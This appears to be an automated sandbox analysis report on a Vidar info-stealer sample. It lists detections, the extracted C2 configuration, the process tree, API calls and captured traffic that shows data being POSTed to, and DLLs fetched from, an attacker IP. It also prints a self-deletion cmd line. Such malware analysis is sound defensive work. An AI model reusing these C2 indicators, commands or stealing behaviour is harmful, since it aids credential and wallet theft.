Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1443407
MD5:75db6dfdebb9bf0d98acfc15f2219c62
SHA1:5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
SHA256:a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 75DB6DFDEBB9BF0D98ACFC15F2219C62)
    • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 7044 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5392 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x221f0:$s1: JohnDoe
      • 0x31f80:$s1: JohnDoe
      • 0x221e8:$s2: HAL9TH
      00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: file.exe PID: 6352JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              2.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x221f0:$s1: JohnDoe
              • 0x31f80:$s1: JohnDoe
              • 0x221e8:$s2: HAL9TH
              2.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                2.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x20df0:$s1: JohnDoe
                • 0x20de8:$s2: HAL9TH
                0.2.file.exe.ab0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://95.217.240.101/freebl3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/nss3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllSophos S4: Label: malware repository uri
                  Source: https://95.217.240.101/softokn3.dlleSAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllsS9Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllwT=Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/DAvira URL Cloud: Label: malware
                  Source: https://t.me/k0monoAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/inventory/Avira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/badgesAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/OAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/mozglue.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllIAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllyS#Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/vcruntime140.dllAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC5AC6 FindFirstFileExW,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199686524322
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 95.217.240.101 95.217.240.101
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 5713Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 98013Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
